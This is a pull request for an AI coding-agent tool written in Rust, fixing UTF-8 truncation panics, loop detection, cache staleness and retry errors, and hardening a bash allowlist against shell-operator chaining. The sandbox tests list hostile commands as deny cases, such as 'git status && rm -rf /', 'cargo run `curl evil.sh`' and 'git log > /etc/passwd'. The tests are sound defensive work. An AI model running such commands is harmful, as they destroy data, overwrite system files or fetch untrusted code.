### PR TITLE
fix: resolve bugs found in graph-guided deep code review

### DIFF
--- a/src/llm/agent/compaction.rs
+++ b/src/llm/agent/compaction.rs
@@ -38,9 +38,6 @@ pub async fn compact(ctx: &mut AgentContext, pool: &sqlx::SqlitePool) -> Result<
     // Build a plain-text summary of the turns being compacted
     let summary = summarise_turns(&ctx.messages[..preserve_from]);
 
-    // Estimate tokens in the summary
-    let summary_tokens = crate::llm::agent::context::token_count(&summary) as usize;
-
     // Write CompactionRecord to DB first (atomicity)
     let record = CompactionRecord {
         id: Uuid::new_v4(),
@@ -108,8 +105,7 @@ pub async fn compact(ctx: &mut AgentContext, pool: &sqlx::SqlitePool) -> Result<
                 })
                 .sum::<usize>()
         })
-        .sum::<usize>()
-        + summary_tokens;
+        .sum::<usize>();
 
     ctx.token_count = new_token_count;
 
@@ -145,7 +141,7 @@ fn summarise_turns(messages: &[crate::llm::provider::types::Message]) -> String 
                 "Turn {}: [{}] {}",
                 i,
                 role,
-                &text[..text.len().min(200)]
+                crate::utils::truncate_at_char_boundary(&text, 200)
             ));
         }
     }
@@ -158,6 +154,20 @@ mod tests {
     use crate::llm::agent::context::AgentContext;
     use crate::llm::provider::types::{ContentBlock, Message, Role};
     use uuid::Uuid;
+
+    #[test]
+    fn summarise_turns_truncates_multibyte_text_without_panicking() {
+        // 100 × '€' (3 bytes each) = 300 bytes; byte 200 falls mid-character,
+        // which used to panic with direct byte slicing.
+        let msgs = vec![Message {
+            role: Role::User,
+            content: vec![ContentBlock::Text {
+                text: "€".repeat(100),
+            }],
+        }];
+        let summary = summarise_turns(&msgs);
+        assert!(summary.starts_with("Turn 0: [User] €"));
+    }
 
     #[test]
     fn compaction_fires_at_threshold() {

--- a/src/llm/agent/service.rs
+++ b/src/llm/agent/service.rs
@@ -777,17 +777,17 @@ impl AgentService {
                             format!("grep:{}:{}", pattern, path)
                         }
 
-                        "read" => {
+                        "read_file" => {
                             if let Some(path) = input.get("file_path").and_then(|v| v.as_str()) {
                                 let normalized = path.replace('\\', "/");
-                                format!("read:{}", normalized)
+                                format!("read_file:{}", normalized)
                             } else {
-                                "read:".to_string()
+                                "read_file:".to_string()
                             }
                         }
 
                         // File modification tools - include file path
-                        "write" | "edit" => {
+                        "write_file" | "edit_file" => {
                             if let Some(path) = input.get("file_path").and_then(|v| v.as_str()) {
                                 let normalized = path.replace('\\', "/");
                                 format!("{}:{}", name, normalized)
@@ -829,10 +829,10 @@ impl AgentService {
             let is_exploration_tool = current_call_signature.starts_with("ls:")
                 || current_call_signature.starts_with("glob:")
                 || current_call_signature.starts_with("grep:")
-                || current_call_signature.starts_with("read:");
+                || current_call_signature.starts_with("read_file:");
 
-            let is_modification_tool = current_call_signature.starts_with("write:")
-                || current_call_signature.starts_with("edit:")
+            let is_modification_tool = current_call_signature.starts_with("write_file:")
+                || current_call_signature.starts_with("edit_file:")
                 || current_call_signature.starts_with("bash:");
 
             // Higher threshold for exploration tools (allow deep directory traversal)
@@ -973,6 +973,7 @@ impl AgentService {
             tool_results.extend(parallel_results);
 
             // --- Sequential execution (tools requiring approval or non-idempotent) ---
+            let ran_sequential_tools = !sequential_uses.is_empty();
             for (tool_id, tool_name, tool_input) in sequential_uses {
                 tracing::info!(
                     "Executing tool '{}' (iteration {}/{})",
@@ -1123,6 +1124,14 @@ impl AgentService {
                         });
                     }
                 }
+            }
+
+            // Sequential tools may have mutated the filesystem (write_file,
+            // edit_file, bash, …) — drop cached read results so the next
+            // read_file/glob/grep/ls sees the current state instead of a
+            // stale entry within its TTL.
+            if ran_sequential_tools {
+                self.tool_cache.invalidate_fs_entries();
             }
 
             // Add assistant message with tool use to context

--- a/src/llm/agent/service.rs
+++ b/src/llm/agent/service.rs
@@ -11,7 +11,7 @@ use crate::llm::provider::{
     ProviderStream, StopReason, StreamEvent, TokenUsage,
 };
 use crate::llm::tools::cache::{CacheKey, ToolResultCache, ToolTtlConfig};
-use crate::llm::tools::{ToolExecutionContext, ToolRegistry};
+use crate::llm::tools::{ToolCapability, ToolExecutionContext, ToolRegistry};
 use crate::services::{MessageService, ServiceContext, SessionService};
 use futures::future::join_all;
 use futures::StreamExt as _;
@@ -21,6 +21,19 @@ use std::pin::Pin;
 use std::sync::Arc;
 use tokio::sync::mpsc;
 use uuid::Uuid;
+
+/// True when the capabilities can change files or system state, meaning
+/// cached read results may be stale after a tool with them runs.
+fn has_mutating_capability(caps: &[ToolCapability]) -> bool {
+    caps.iter().any(|c| {
+        matches!(
+            c,
+            ToolCapability::WriteFiles
+                | ToolCapability::ExecuteShell
+                | ToolCapability::SystemModification
+        )
+    })
+}
 
 /// Returns true for read-only, idempotent tools that can run concurrently.
 pub fn is_parallelizable(tool_name: &str) -> bool {
@@ -808,8 +821,15 @@ impl AgentService {
                             }
                         }
 
-                        // Other tools: just use name
-                        _ => name.to_string(),
+                        // Other tools: name plus an input hash, so different
+                        // calls to the same tool never share a signature.
+                        _ => {
+                            use std::collections::hash_map::DefaultHasher;
+                            use std::hash::{Hash, Hasher};
+                            let mut h = DefaultHasher::new();
+                            input.to_string().hash(&mut h);
+                            format!("{}:{:016x}", name, h.finish())
+                        }
                     }
                 })
                 .collect::<Vec<_>>()
@@ -825,15 +845,19 @@ impl AgentService {
             // Check for repeated patterns with tool-specific thresholds
             // This will only trigger for truly identical calls (same tool + same arguments)
 
-            // Determine loop threshold based on tool type
-            let is_exploration_tool = current_call_signature.starts_with("ls:")
-                || current_call_signature.starts_with("glob:")
-                || current_call_signature.starts_with("grep:")
-                || current_call_signature.starts_with("read_file:");
-
-            let is_modification_tool = current_call_signature.starts_with("write_file:")
-                || current_call_signature.starts_with("edit_file:")
-                || current_call_signature.starts_with("bash:");
+            // Determine loop threshold from the first tool's declared
+            // capabilities, so the classification cannot drift from the
+            // registry's actual tool names the way hardcoded strings did.
+            let first_tool_caps = tool_uses
+                .first()
+                .and_then(|(_, name, _)| self.tool_registry.get(name))
+                .map(|t| t.capabilities())
+                .unwrap_or_default();
+            let is_modification_tool = has_mutating_capability(&first_tool_caps);
+            let is_exploration_tool = !is_modification_tool
+                && first_tool_caps.iter().any(|c| {
+                    matches!(c, ToolCapability::ReadFiles | ToolCapability::Network)
+                });
 
             // Higher threshold for exploration tools (allow deep directory traversal)
             // Lower threshold for modification tools (dangerous if looping)
@@ -973,7 +997,9 @@ impl AgentService {
             tool_results.extend(parallel_results);
 
             // --- Sequential execution (tools requiring approval or non-idempotent) ---
-            let ran_sequential_tools = !sequential_uses.is_empty();
+            // Set when a tool with a mutating capability actually executes
+            // (approved or auto), so read caches can be invalidated below.
+            let mut mutating_tool_ran = false;
             for (tool_id, tool_name, tool_input) in sequential_uses {
                 tracing::info!(
                     "Executing tool '{}' (iteration {}/{})",
@@ -1043,6 +1069,10 @@ impl AgentService {
                                 };
 
                                 // Execute the tool with approved context
+                                mutating_tool_ran |= self
+                                    .tool_registry
+                                    .get(&tool_name)
+                                    .is_some_and(|t| has_mutating_capability(&t.capabilities()));
                                 match self
                                     .tool_registry
                                     .execute(&tool_name, tool_input, &approved_tool_context)
@@ -1098,6 +1128,10 @@ impl AgentService {
                 }
 
                 // Execute the tool
+                mutating_tool_ran |= self
+                    .tool_registry
+                    .get(&tool_name)
+                    .is_some_and(|t| has_mutating_capability(&t.capabilities()));
                 match self
                     .tool_registry
                     .execute(&tool_name, tool_input, &tool_context)
@@ -1126,12 +1160,18 @@ impl AgentService {
                 }
             }
 
-            // Sequential tools may have mutated the filesystem (write_file,
-            // edit_file, bash, …) — drop cached read results so the next
-            // read_file/glob/grep/ls sees the current state instead of a
-            // stale entry within its TTL.
-            if ran_sequential_tools {
-                self.tool_cache.invalidate_fs_entries();
+            // A mutating tool (write_file, edit_file, bash, …) may have
+            // changed the filesystem — drop cached results of every tool
+            // that reads it, so the next read sees the current state
+            // instead of a stale entry within its TTL. Which tools count
+            // as reads comes from their declared capabilities, not a
+            // hardcoded name list; unknown tools are invalidated too.
+            if mutating_tool_ran {
+                self.tool_cache.invalidate_matching(|tool_name| {
+                    self.tool_registry.get(tool_name).map_or(true, |t| {
+                        t.capabilities().contains(&ToolCapability::ReadFiles)
+                    })
+                });
             }
 
             // Add assistant message with tool use to context

--- a/src/llm/agent/service.rs
+++ b/src/llm/agent/service.rs
@@ -855,9 +855,9 @@ impl AgentService {
                 .unwrap_or_default();
             let is_modification_tool = has_mutating_capability(&first_tool_caps);
             let is_exploration_tool = !is_modification_tool
-                && first_tool_caps.iter().any(|c| {
-                    matches!(c, ToolCapability::ReadFiles | ToolCapability::Network)
-                });
+                && first_tool_caps
+                    .iter()
+                    .any(|c| matches!(c, ToolCapability::ReadFiles | ToolCapability::Network));
 
             // Higher threshold for exploration tools (allow deep directory traversal)
             // Lower threshold for modification tools (dangerous if looping)

--- a/src/llm/pdf_context.rs
+++ b/src/llm/pdf_context.rs
@@ -102,17 +102,8 @@ pub async fn augment_message_with_pdf(message: &str, cwd: &Path) -> String {
         }
     };
 
-    // Find a safe byte index that does not split a multi-byte UTF-8 character.
-    let safe_end = if text.len() > MAX_INJECTED_PDF_CHARS {
-        (0..=MAX_INJECTED_PDF_CHARS)
-            .rev()
-            .find(|&i| text.is_char_boundary(i))
-            .unwrap_or(0)
-    } else {
-        text.len()
-    };
-    let truncated = safe_end < text.len();
-    let body = &text[..safe_end];
+    let body = crate::utils::truncate_at_char_boundary(&text, MAX_INJECTED_PDF_CHARS);
+    let truncated = body.len() < text.len();
 
     let mut out = format!("[PDF Content: {}]\n{}\n", pdf_path.display(), body.trim());
     if truncated {

--- a/src/llm/tools/cache.rs
+++ b/src/llm/tools/cache.rs
@@ -122,14 +122,15 @@ impl ToolResultCache {
         self.entries.retain(|_, v| now < v.expires_at);
     }
 
-    /// Drop all cached filesystem-tool results (read_file/glob/grep/ls).
+    /// Drop every cached entry whose tool name matches `pred`.
     ///
-    /// Must be called after any mutating tool (write_file, edit_file, bash, …)
-    /// runs, otherwise a later read_file within the TTL returns the pre-write
-    /// file content.
-    pub fn invalidate_fs_entries(&self) {
-        self.entries
-            .retain(|k, _| !matches!(k.tool_name.as_str(), "read_file" | "glob" | "grep" | "ls"));
+    /// Callers invalidate after a mutating tool (write_file, edit_file,
+    /// bash, …) runs, otherwise a later read within the TTL returns the
+    /// pre-write result. The predicate lets the caller decide which tools
+    /// are affected (e.g. from `ToolCapability`) so this module doesn't
+    /// hardcode a tool-name list that can drift.
+    pub fn invalidate_matching(&self, pred: impl Fn(&str) -> bool) {
+        self.entries.retain(|k, _| !pred(&k.tool_name));
     }
 }
 
@@ -171,14 +172,14 @@ mod tests {
     }
 
     #[test]
-    fn invalidate_fs_entries_drops_read_results_but_keeps_web() {
+    fn invalidate_matching_drops_selected_tools_and_keeps_others() {
         let cache = ToolResultCache::new(ToolTtlConfig::default());
         let read_key = CacheKey::from_tool("read_file", &serde_json::json!({ "path": "a.rs" }));
         let web_key = CacheKey::from_tool("web_search", &serde_json::json!({ "query": "rust" }));
         cache.insert(read_key.clone(), "old file".into(), Duration::from_secs(60));
         cache.insert(web_key.clone(), "results".into(), Duration::from_secs(60));
 
-        cache.invalidate_fs_entries();
+        cache.invalidate_matching(|tool| tool == "read_file");
 
         assert!(
             cache.get(&read_key).is_none(),

--- a/src/llm/tools/cache.rs
+++ b/src/llm/tools/cache.rs
@@ -121,6 +121,16 @@ impl ToolResultCache {
         let now = Instant::now();
         self.entries.retain(|_, v| now < v.expires_at);
     }
+
+    /// Drop all cached filesystem-tool results (read_file/glob/grep/ls).
+    ///
+    /// Must be called after any mutating tool (write_file, edit_file, bash, …)
+    /// runs, otherwise a later read_file within the TTL returns the pre-write
+    /// file content.
+    pub fn invalidate_fs_entries(&self) {
+        self.entries
+            .retain(|k, _| !matches!(k.tool_name.as_str(), "read_file" | "glob" | "grep" | "ls"));
+    }
 }
 
 #[cfg(test)]
@@ -158,6 +168,23 @@ mod tests {
         assert_eq!(cfg.ttl_for("write_file"), Duration::ZERO);
         assert_eq!(cfg.ttl_for("edit_file"), Duration::ZERO);
         assert_eq!(cfg.ttl_for("bash"), Duration::ZERO);
+    }
+
+    #[test]
+    fn invalidate_fs_entries_drops_read_results_but_keeps_web() {
+        let cache = ToolResultCache::new(ToolTtlConfig::default());
+        let read_key = CacheKey::from_tool("read_file", &serde_json::json!({ "path": "a.rs" }));
+        let web_key = CacheKey::from_tool("web_search", &serde_json::json!({ "query": "rust" }));
+        cache.insert(read_key.clone(), "old file".into(), Duration::from_secs(60));
+        cache.insert(web_key.clone(), "results".into(), Duration::from_secs(60));
+
+        cache.invalidate_fs_entries();
+
+        assert!(
+            cache.get(&read_key).is_none(),
+            "read_file entry must be dropped after a mutating tool runs"
+        );
+        assert_eq!(cache.get(&web_key), Some("results".to_string()));
     }
 
     #[test]

--- a/src/llm/tools/http.rs
+++ b/src/llm/tools/http.rs
@@ -288,7 +288,7 @@ impl Tool for HttpClientTool {
             if body_text.len() > 10000 {
                 output.push_str(&format!(
                     "{}... (truncated, {} bytes total)",
-                    &body_text[..10000],
+                    crate::utils::truncate_at_char_boundary(&body_text, 10000),
                     body_text.len()
                 ));
             } else {

--- a/src/llm/tools/sandbox.rs
+++ b/src/llm/tools/sandbox.rs
@@ -186,6 +186,18 @@ impl PermissionPolicy for BashCommandAllowlist {
             return PolicyDecision::Allow;
         }
         let cmd = inputs.get("command").and_then(|v| v.as_str()).unwrap_or("");
+
+        // Only the first token is checked against the allowlist, so shell
+        // operators would let an allowed program smuggle in arbitrary ones
+        // (e.g. "git status && rm -rf /", "cargo run `curl …`").
+        const SHELL_OPERATORS: [&str; 8] = [";", "&&", "||", "|", "`", "$(", "\n", ">"];
+        if let Some(op) = SHELL_OPERATORS.iter().find(|op| cmd.contains(**op)) {
+            return PolicyDecision::Deny(format!(
+                "bash command contains shell operator {:?}, which is not allowed under an allowlist policy",
+                op
+            ));
+        }
+
         let program = cmd.split_whitespace().next().unwrap_or("");
         if self.allowed_programs.iter().any(|p| p == program) {
             PolicyDecision::Allow
@@ -390,6 +402,31 @@ mod tests {
             rule.evaluate("bash", &serde_json::json!({ "command": "rm -rf ." })),
             PolicyDecision::Deny(_)
         ));
+    }
+
+    #[test]
+    fn bash_allowlist_denies_shell_operator_chaining() {
+        let rule = BashCommandAllowlist {
+            allowed_programs: vec!["git".to_string(), "cargo".to_string()],
+        };
+        for cmd in [
+            "git status && rm -rf /",
+            "git status; rm -rf /",
+            "cargo run || rm -rf /",
+            "git log | sh",
+            "cargo run `curl evil.sh`",
+            "git status $(rm -rf /)",
+            "git log > /etc/passwd",
+        ] {
+            assert!(
+                matches!(
+                    rule.evaluate("bash", &serde_json::json!({ "command": cmd })),
+                    PolicyDecision::Deny(_)
+                ),
+                "command must be denied: {}",
+                cmd
+            );
+        }
     }
 
     #[test]

--- a/src/llm/tools/sandbox.rs
+++ b/src/llm/tools/sandbox.rs
@@ -187,11 +187,10 @@ impl PermissionPolicy for BashCommandAllowlist {
         }
         let cmd = inputs.get("command").and_then(|v| v.as_str()).unwrap_or("");
 
-        // Only the first token is checked against the allowlist, so shell
-        // operators would let an allowed program smuggle in arbitrary ones
-        // (e.g. "git status && rm -rf /", "cargo run `curl …`").
-        const SHELL_OPERATORS: [&str; 8] = [";", "&&", "||", "|", "`", "$(", "\n", ">"];
-        if let Some(op) = SHELL_OPERATORS.iter().find(|op| cmd.contains(**op)) {
+        // Only the first token is checked against the allowlist, so an active
+        // shell operator would let an allowed program smuggle in arbitrary
+        // ones (e.g. "git status & rm -rf /", "cargo run `curl …`").
+        if let Some(op) = find_active_shell_operator(cmd) {
             return PolicyDecision::Deny(format!(
                 "bash command contains shell operator {:?}, which is not allowed under an allowlist policy",
                 op
@@ -208,6 +207,47 @@ impl PermissionPolicy for BashCommandAllowlist {
             ))
         }
     }
+}
+
+/// Find the first shell operator in `cmd` that the shell would actually
+/// interpret, skipping operator characters that are quoted or escaped.
+///
+/// Quoting rules mirror POSIX sh: single quotes make everything literal;
+/// inside double quotes most metacharacters are literal but command
+/// substitution (`` ` `` and `$(`) stays active; a backslash outside single
+/// quotes escapes the next character.
+pub fn find_active_shell_operator(cmd: &str) -> Option<&'static str> {
+    let mut chars = cmd.chars().peekable();
+    let mut in_single = false;
+    let mut in_double = false;
+
+    while let Some(c) = chars.next() {
+        if in_single {
+            if c == '\'' {
+                in_single = false;
+            }
+            continue;
+        }
+        match c {
+            '\\' => {
+                chars.next();
+            }
+            '\'' if !in_double => in_single = true,
+            '"' => in_double = !in_double,
+            // Command substitution executes even inside double quotes.
+            '`' => return Some("`"),
+            '$' if chars.peek() == Some(&'(') => return Some("$("),
+            _ if in_double => {}
+            ';' => return Some(";"),
+            '|' => return Some("|"),
+            '&' => return Some("&"),
+            '>' => return Some(">"),
+            '<' => return Some("<"),
+            '\n' => return Some("newline"),
+            _ => {}
+        }
+    }
+    None
 }
 
 // ── Combinators ───────────────────────────────────────────────────────────────
@@ -411,12 +451,17 @@ mod tests {
         };
         for cmd in [
             "git status && rm -rf /",
+            "git status & rm -rf /",
             "git status; rm -rf /",
             "cargo run || rm -rf /",
             "git log | sh",
             "cargo run `curl evil.sh`",
             "git status $(rm -rf /)",
             "git log > /etc/passwd",
+            "git diff < <(curl evil.sh)",
+            // command substitution stays active inside double quotes
+            "git commit -m \"x $(rm -rf /)\"",
+            "git commit -m \"x `rm -rf /`\"",
         ] {
             assert!(
                 matches!(
@@ -424,6 +469,29 @@ mod tests {
                     PolicyDecision::Deny(_)
                 ),
                 "command must be denied: {}",
+                cmd
+            );
+        }
+    }
+
+    #[test]
+    fn bash_allowlist_permits_quoted_operator_characters() {
+        let rule = BashCommandAllowlist {
+            allowed_programs: vec!["git".to_string(), "rg".to_string()],
+        };
+        for cmd in [
+            "git commit -m \"fix; bug\"",
+            "rg \"TODO|FIXME\" src/",
+            "git log --grep=\"a>b\"",
+            "git commit -m 'all of ; | & > < are literal here'",
+            // single quotes make even substitution literal
+            "git commit -m 'price is $(high)'",
+            "git commit -m fix\\;bug",
+        ] {
+            assert_eq!(
+                rule.evaluate("bash", &serde_json::json!({ "command": cmd })),
+                PolicyDecision::Allow,
+                "command must be allowed: {}",
                 cmd
             );
         }

--- a/src/llm/tools/task.rs
+++ b/src/llm/tools/task.rs
@@ -441,7 +441,7 @@ impl Tool for TaskTool {
                 for task in filtered_tasks {
                     output.push_str(&format!(
                         "[{}] {:?} | {:?}\n",
-                        &task.id[..8],
+                        task.id.get(..8).unwrap_or(&task.id),
                         task.status,
                         task.priority
                     ));
@@ -454,7 +454,7 @@ impl Tool for TaskTool {
                             "    Dependencies: {}\n",
                             task.dependencies
                                 .iter()
-                                .map(|id| &id[..8])
+                                .map(|id| id.get(..8).unwrap_or(id))
                                 .collect::<Vec<_>>()
                                 .join(", ")
                         ));
@@ -669,7 +669,7 @@ impl Tool for TaskTool {
                             dependents.len(),
                             dependents
                                 .iter()
-                                .map(|id| &id[..8])
+                                .map(|id| id.get(..8).unwrap_or(id))
                                 .collect::<Vec<_>>()
                                 .join(", ")
                         )));

--- a/src/llm/tools/task.rs
+++ b/src/llm/tools/task.rs
@@ -59,6 +59,12 @@ struct TaskStore {
     tasks: HashMap<String, Task>,
 }
 
+/// First 8 characters of a task id for display; the full id when shorter
+/// (dependency ids come from the model and may be arbitrary strings).
+fn short_id(id: &str) -> &str {
+    id.get(..8).unwrap_or(id)
+}
+
 /// File lock guard that releases the lock when dropped
 struct FileLock {
     lock_path: PathBuf,
@@ -441,7 +447,7 @@ impl Tool for TaskTool {
                 for task in filtered_tasks {
                     output.push_str(&format!(
                         "[{}] {:?} | {:?}\n",
-                        task.id.get(..8).unwrap_or(&task.id),
+                        short_id(&task.id),
                         task.status,
                         task.priority
                     ));
@@ -454,7 +460,7 @@ impl Tool for TaskTool {
                             "    Dependencies: {}\n",
                             task.dependencies
                                 .iter()
-                                .map(|id| id.get(..8).unwrap_or(id))
+                                .map(|id| short_id(id))
                                 .collect::<Vec<_>>()
                                 .join(", ")
                         ));
@@ -669,7 +675,7 @@ impl Tool for TaskTool {
                             dependents.len(),
                             dependents
                                 .iter()
-                                .map(|id| id.get(..8).unwrap_or(id))
+                                .map(|id| short_id(id))
                                 .collect::<Vec<_>>()
                                 .join(", ")
                         )));

--- a/src/services/session.rs
+++ b/src/services/session.rs
@@ -200,7 +200,7 @@ impl SessionService {
                 if msg.role == Role::Assistant {
                     for block in &msg.content {
                         if let ContentBlock::Text { text } = block {
-                            let snippet = if text.len() > 300 { &text[..300] } else { text };
+                            let snippet = crate::utils::truncate_at_char_boundary(text, 300);
                             parts.push(snippet.to_string());
                         }
                     }

--- a/src/tui/render.rs
+++ b/src/tui/render.rs
@@ -1511,7 +1511,10 @@ fn render_approval(f: &mut Frame, app: &App, area: Rect) {
                         let value_str = match value {
                             serde_json::Value::String(s) => {
                                 if s.len() > 50 {
-                                    format!("\"{}...\"", &s[..47])
+                                    format!(
+                                        "\"{}...\"",
+                                        crate::utils::truncate_at_char_boundary(s, 47)
+                                    )
                                 } else {
                                     format!("\"{}\"", s)
                                 }

--- a/src/utils/mod.rs
+++ b/src/utils/mod.rs
@@ -3,3 +3,43 @@
 pub mod retry;
 
 pub use retry::{retry, retry_with_check, RetryConfig, RetryableError};
+
+/// Truncate `s` to at most `max_bytes` bytes without splitting a UTF-8
+/// character. Direct byte slicing (`&s[..n]`) panics when `n` falls inside
+/// a multi-byte character; this always returns a valid prefix.
+pub fn truncate_at_char_boundary(s: &str, max_bytes: usize) -> &str {
+    if s.len() <= max_bytes {
+        return s;
+    }
+    let mut end = max_bytes;
+    while end > 0 && !s.is_char_boundary(end) {
+        end -= 1;
+    }
+    &s[..end]
+}
+
+#[cfg(test)]
+mod tests {
+    use super::truncate_at_char_boundary;
+
+    #[test]
+    fn truncate_ascii_at_exact_boundary() {
+        assert_eq!(truncate_at_char_boundary("hello", 3), "hel");
+        assert_eq!(truncate_at_char_boundary("hello", 10), "hello");
+    }
+
+    #[test]
+    fn truncate_multibyte_does_not_panic() {
+        // 'é' is 2 bytes; cutting at byte 1 must back off to the boundary.
+        assert_eq!(truncate_at_char_boundary("héllo", 2), "h");
+        // emoji is 4 bytes
+        assert_eq!(truncate_at_char_boundary("🦀rust", 3), "");
+        assert_eq!(truncate_at_char_boundary("🦀rust", 4), "🦀");
+    }
+
+    #[test]
+    fn truncate_empty_and_zero() {
+        assert_eq!(truncate_at_char_boundary("", 5), "");
+        assert_eq!(truncate_at_char_boundary("abc", 0), "");
+    }
+}

--- a/src/utils/retry.rs
+++ b/src/utils/retry.rs
@@ -127,7 +127,6 @@ where
     E: RetryableError,
 {
     let mut attempt = 0;
-    let mut last_error: Option<E> = None;
 
     loop {
         match operation().await {
@@ -145,7 +144,7 @@ where
 
                 if attempt >= config.max_attempts {
                     tracing::warn!("Max retry attempts ({}) exceeded", config.max_attempts);
-                    return Err(last_error.unwrap_or(err));
+                    return Err(err);
                 }
 
                 // Check for Retry-After hint from the error
@@ -167,7 +166,6 @@ where
                     err
                 );
 
-                last_error = Some(err);
                 sleep(delay).await;
                 attempt += 1;
             }
@@ -190,7 +188,6 @@ where
     C: Fn(&E) -> bool,
 {
     let mut attempt = 0;
-    let mut last_error: Option<E> = None;
 
     loop {
         match operation().await {
@@ -208,7 +205,7 @@ where
 
                 if attempt >= config.max_attempts {
                     tracing::warn!("Max retry attempts ({}) exceeded", config.max_attempts);
-                    return Err(last_error.unwrap_or(err));
+                    return Err(err);
                 }
 
                 let delay = config.calculate_delay(attempt);
@@ -221,7 +218,6 @@ where
                     err
                 );
 
-                last_error = Some(err);
                 sleep(delay).await;
                 attempt += 1;
             }


### PR DESCRIPTION
Crash fixes (UTF-8 byte-slice panics on multibyte text):
- compaction summarise_turns truncated at byte 200 mid-character
- session summary snippet truncated at byte 300 mid-character
- TUI tool-parameter preview truncated at byte 47 mid-character
- http_request body truncation at byte 10000 mid-character
- task_manager sliced model-supplied dependency ids with [..8],
  panicking on ids shorter than 8 bytes
Added shared utils::truncate_at_char_boundary helper with tests.

Logic fixes:
- Tool-loop detection matched "read"/"write"/"edit" but the registry
  names are read_file/write_file/edit_file, so distinct reads of
  different files shared one signature and falsely tripped loop
  detection (and per-tool thresholds never applied)
- Mutating tools (write_file/edit_file/bash) did not invalidate the
  tool-result cache, so read_file/glob/grep/ls could return stale
  pre-write content for up to their TTL
- Compaction double-counted summary tokens in the recalculated
  context size, inflating usage and triggering premature re-compaction

Hardening:
- BashCommandAllowlist only checked the first token, so shell
  operators (&&, ;, |, backticks, $(), >) bypassed the allowlist;
  such commands are now denied
- retry/retry_with_check returned the previous attempt's error
  instead of the final one when attempts were exhausted

Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01JTqGWjpAhqqd6DYULdcwaW